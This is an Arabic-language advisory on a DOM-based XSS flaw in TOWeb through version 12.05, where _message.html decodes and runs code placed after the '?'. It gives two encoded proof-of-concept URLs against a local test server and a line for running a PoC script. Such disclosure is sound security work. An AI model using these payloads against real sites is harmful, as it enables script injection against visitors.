
(DOM-based XSS) ثغرة حقن HTML في TOWeb الإصدار 12.05 وما قبله تسمح للمهاجم بحقن كود HTML/JS عبر المكون _message.html.
cf https://www.lauyan.com/en/toweb-updates.html#iyFEw37D
ثغرة حقن HTML (XSS قائمة على DOM) في إصدار TOWeb 5 <= 12.05 تسمح للمهاجم بحقن كود HTML/JS عبر مكون _message.html.
_message.html يُستخدم لعرض صفحة خطأ، عن طريق فك تشفير وتنفيذ الشيفرة الواقعة بعد علامة ?.127.0.0.1:8000/_message.html?==gP2lGZvwjP2lGZvwjPyJGP+InY84DcvwDZuV3bGBCdv5EIldWYQ5Dc84jMo9CPg4jMoxjPiEmchBXL3RnI9M3chx2YgYXakxjPxg2L8IXdlJncF5TMoxjPiIXZ05WZjpjbnlGbh1Cd4VGdi0TZslHdzBidpRGP).python3 poc.py; python3 -m http.server -d src -> مثلاً http://127.0.0.1:8000/_message.html?==gC+QHcpJ3Yz9CPpcyUThFIkV2chJWLN9ERngCdyVGbh5DdwlmcjNHP